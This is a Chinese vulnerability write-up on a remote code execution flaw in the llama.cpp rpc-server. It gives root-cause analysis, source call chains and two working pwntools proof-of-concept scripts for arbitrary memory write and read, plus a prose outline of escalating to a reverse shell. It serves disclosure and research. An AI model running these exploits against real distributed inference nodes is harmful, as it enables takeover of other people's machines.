本文由CVES实验室-7resp4ss同学原创
一、概述
该漏洞源于llama.cpp中的rpc-server功能,评分9.8分
在b3561版本前,llama.cpp在分布式推理的场景下存在可以导致rce的组合漏洞利用(本文的研究也基于b3561版本)。主要用到了以下两个漏洞
-
rpc_server::set_tensor函数中存在任意地址写
-
rpc_server::get_tensor函数中存在任意地址读
根本原因是llama.cpp在分布式推理是将tensor发送给推理节点时没对tensor结构体进行一定的安全性检测,从而可以攻击推理节点。
llama.cpp 是用来干什么的?
一句话概括:llama.cpp 是一个用于大模型推理和量化的框架,专门针对 Meta 的 LLaMA 模型进行优化。该框架使用 C++ 开发,具备跨平台支持的优势,例如可以在安卓手机等多种环境中运行大模型推理任务。
分布式推理又是什么个事?
也就是一台机器跑大模型资源不够,就用多个机器构建集群进行分布式推理。llama.cpp官方文档写明,使用以下方式可以进行分布式推理:
-
辅助推理节点执行:
bin/rpc-server -p 50052
来监听0.0.0.0的50052端口
-
主节点执行:
bin/llama-cli -m ../models/tinyllama-1b/ggml-model-f16.gguf -p "Hello, my name is" --repeat-penalty 1.0 -n 64 --rpc 192.168.88.10:50052,192.168.88.11:50052 -ngl 99
这样就可以让主节点在推理时将一部分需要处理的tensor发送给辅助推理节点处理。漏洞也存在这部分逻辑,当一个恶意攻击者连接rpc-server时,可以发送精心构造的数据来攻击辅助推理节点。
二、漏洞细节
首先,注意 rpc_tensor 结构中的 data 指针成员可以被远程连接的用户控制。
struct rpc_tensor {
uint64_t id;
uint32_t type;
uint64_t buffer;
uint32_t ne[GGML_MAX_DIMS];
uint32_t nb[GGML_MAX_DIMS];
uint32_t op;
int32_t op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
int32_t flags;
uint64_t src[GGML_MAX_SRC];
uint64_t view_src;
uint64_t view_offs;
uint64_t data;
char name[GGML_MAX_NAME];
char padding[4];
};
通过控制 data 指针的值,我们可以在以下调用过程中实现任意地址写入以及任意地址读。
任意地址写
以下是导致任意地址写入的函数调用链:
-
start_rpc_sercer:
https://github.com/ggerganov/llama.cpp/blob/75af08c475e285888f66556d0f459c533b7deb95/ggml/src/ggml-rpc.cpp#L1144
-
rpc_serve_client:
https://github.com/ggerganov/llama.cpp/blob/75af08c475e285888f66556d0f459c533b7deb95/ggml/src/ggml-rpc.cpp#L1060
-
rpc_server::set_tensor:
https://github.com/ggerganov/llama.cpp/blob/e31a4f679779220312c165b0f5994c680a610e38/ggml/src/ggml-rpc.cpp#L893
-
ggml_backend_tensor_set:
https://github.com/ggerganov/llama.cpp/blob/400ae6f65f0b55babd48d1e3ec7fd663a97fc8d0/ggml/src/ggml-backend.c#L221
-
ggml_backend_cpu_buffer_set_tensor:
https://github.com/ggerganov/llama.cpp/blob/400ae6f65f0b55babd48d1e3ec7fd663a97fc8d0/ggml/src/ggml-backend.c#L577
PoC
from pwn import *
ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10
context(arch='amd64',log_level = 'debug')
p = remote("127.0.0.1",50052)
pd = b''
cmd = p8(GET_DEVICE_MEMORY)
content = b''
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
recv = p.recvall(timeout=1)
p.close()
p = remote("127.0.0.1",50052)
pd = b''
cmd = p8(GET_ALIGNMENT)
content = b''
input_size = p64(len(content))
pd+= cmd + input_size + content
cmd = p8(ALLOC_BUFFER)
content = p64(0x100)
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
recv = p.recvall(timeout=1)
remote_ptr = u64(recv[0x18:0x20])
sz = u64(recv[0x20:0x28])
log.success(f"remote_ptr:{hex(remote_ptr)},size:{sz}")
p.recvall(timeout=1)
p.close()
'''
When the vulnerability cannot be triggered, you might want to adjust the next_ptr variable in the script to the buffer address returned by ALLOC_BUFFER.
'''
next_ptr = remote_ptr + 0x160
log.success(f'next_ptr:{hex(next_ptr)}')
p = remote("127.0.0.1",50052)
cmd = p8(ALLOC_BUFFER)
content = p64(0x100)
input_size = p64(len(content))
pd = cmd + input_size + content
leak_address = remote_ptr + 0x90
#fake a rpc_tensor
rpc_tensor_pd = flat(
{
0: [
0x1, # id
p32(2), # type
p64(next_ptr), # buffer
[ # ne
p32(0xdeadbeef),
p32(0xdeadbeef),
p32(0xdeadbeef),
p32(0xdeadbeef),
],
[ # nb
p32(1),
p32(1),
p32(1),
p32(1),
],
p32(0), # op
[p32(0)] * 16, # op_params (corrected from 8 to 16)
p32(0), # flags
[p64(0)] * 10, # src
p64(0), # view_src
p64(0), # view_offs
p64(0xdeadbeef), # data
'a' * 64, # name
'x' * 4 # padding
],
}
)
cmd = p8(SET_TENSOR)
content = flat(
{
0: [rpc_tensor_pd + p64(0) + p64(0x100),
b'a'*0x100]
}
)
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
p.recv(0x18)
p.close()
任意地址读
以下是导致任意地址读取的函数调用链:
-
start_rpc_server:
https://github.com/ggerganov/llama.cpp/blob/75af08c475e285888f66556d0f459c533b7deb95/ggml/src/ggml-rpc.cpp#L1144
-
rpc_serve_client:
https://github.com/ggerganov/llama.cpp/blob/75af08c475e285888f66556d0f459c533b7deb95/ggml/src/ggml-rpc.cpp#L1060
-
rpc_server::get_tensor:
https://github.com/ggerganov/llama.cpp/blob/e31a4f679779220312c165b0f5994c680a610e38/ggml/src/ggml-rpc.cpp#L922
-
ggml_backend_tensor_get:
https://github.com/ggerganov/llama.cpp/blob/400ae6f65f0b55babd48d1e3ec7fd663a97fc8d0/ggml/src/ggml-backend.c#L235
-
ggml_backend_cpu_buffer_get_tensor:
https://github.com/ggerganov/llama.cpp/blob/400ae6f65f0b55babd48d1e3ec7fd663a97fc8d0/ggml/src/ggml-backend.c#L583C1-L587C2
PoC
from pwn import *
ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10
context(arch='amd64',log_level = 'debug')
base_memory = 0x0
p = remote("127.0.0.1",50052)
pd = b''
cmd = p8(GET_DEVICE_MEMORY)
content = b''
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
recv = p.recvall(timeout=1)
p.close()
p = remote("127.0.0.1",50052)
pd = b''
cmd = p8(GET_ALIGNMENT)
content = b''
input_size = p64(len(content))
pd+= cmd + input_size + content
cmd = p8(ALLOC_BUFFER)
content = p64(0x100)
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
recv = p.recvall(timeout=1)
remote_ptr = u64(recv[0x18:0x20])
sz = u64(recv[0x20:0x28])
log.success(f"remote_ptr:{hex(remote_ptr)},size:{sz}")
p.recvall(timeout=1)
p.close()
'''
When the vulnerability cannot be triggered, you might want to adjust the next_ptr variable in the script to the buffer address returned by ALLOC_BUFFER.
'''
next_ptr = remote_ptr + 0x160
log.success(f'next_ptr:{hex(next_ptr)}')
p = remote("127.0.0.1",50052)
cmd = p8(ALLOC_BUFFER)
content = p64(0x100)
input_size = p64(len(content))
pd = cmd + input_size + content
rpc_tensor_pd = flat(
{
0: [
0x1, # id
p32(2), # type
p64(next_ptr), # buffer
[ # ne
p32(0xdeadbeef),
p32(0xdeadbeef),
p32(0xdeadbeef),
p32(0xdeadbeef),
],
[ # nb
p32(1),
p32(1),
p32(1),
p32(1),
],
p32(0), # op
[p32(0)] * 16, # op_params (corrected from 8 to 16)
p32(0), # flags
[p64(0)] * 10, # src
p64(0), # view_src
p64(0), # view_offs
p64(0xdeadbeef), # data
'a' * 64, # name
'x' * 4 # padding
],
}
)
cmd = p8(GET_TENSOR)
content = flat(
{
0: rpc_tensor_pd + p64(0) + p64(0x100)
}
)
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
p.recv(0x18)
p.close()
三、复现
构建
git clone https://github.com/ggerganov/llama.cpp.git && cd llama.cpp && git checkout b3560 && mkdir build-rpc && cmake .. -DGGML_RPC=ON && cmake --build . --config Release
pip install pwn
环境
uname -a
Linux heckar-virtual-machine 6.8.0-40-generic #40~22.04.3-Ubuntu SMP PREEMPT_DYNAMIC Tue Jul 30 17:30:19 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
6 /lib/x86_64-linux-gnu/libc.so.
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.8) stable release version 2.35.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 11.4.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
复现
在 llama/llama.cpp/build-rpc/bin 中,运行以下命令:
./rpc-server -p 50052
然后用上面的PoC打就可以了。
漏洞利用思路
由于我们有两个很强的原语,其实可以很好的漏洞利用。最好的一种办法就是修改llama.cpp运行时会调用的函数指针,但是笔者没空研究,就用了以下传统打libc的思路:
-
任意地址读ALLOC_BUFFER申请返回地址附近的libc地址,得到libc基址
-
想办法伪造IOFILE结构体
-
想办法修改puts会调用的libc.got为exit
-
rpc-server调用puts,触发exit,触发IO操作,反弹shell
影响
远程命令执行,控制推理节点。
其他
其实llama.cpp的分布式推理仍然存在一些安全问题,在我报送以上漏洞后,他们就将分布式推理标注为实验性的,并说明不会接受与其相关的进一步公告,直到他们投入足够的开发时间来稳定它。
原文始发于微信公众号(山海之关):人工智能大模型框架核弹级漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论